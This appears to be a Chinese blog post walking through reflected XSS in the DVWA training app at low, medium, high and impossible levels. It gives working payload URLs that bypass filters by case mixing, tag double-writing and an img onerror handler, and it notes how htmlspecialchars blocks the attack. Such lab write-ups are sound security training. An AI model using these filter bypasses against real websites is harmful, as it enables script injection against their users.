dvwa-反射型xss
1、低级别
查看服务端代码提示,即直接echo将参数输出到pre标签中。
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=az%3Cscript%3Ealert(/xss/)%3C/script%3E
2、中级别
查看服务端代码提示,使用了str_replace函数对参数进行过滤,将<script>替代为””。
解决:由于代码只进行了一次替换,因此可以双写绕过,且该处还可以大小写混杂绕过。
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=zz%3CScript%3Ealert(123)%3C/sCript%3E#
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=zz%3Cscri%3Cscript%3Ept%3Ealert(/xss/)%3C/script%3E#
3、高级别
查看服务端代码提示,使用了preg_replace函数进行正则过滤,限制了script标签。
解决:使用其他标签即可,比如img
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=zz%3Cimg%20src=1%20onerror=alert(/xss/)%3E#
4、不可能级别
查看服务端代码提示,使用了htmlspecialchars函数对参数进行实体编码,几乎可以确保反射型xss无法存在
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战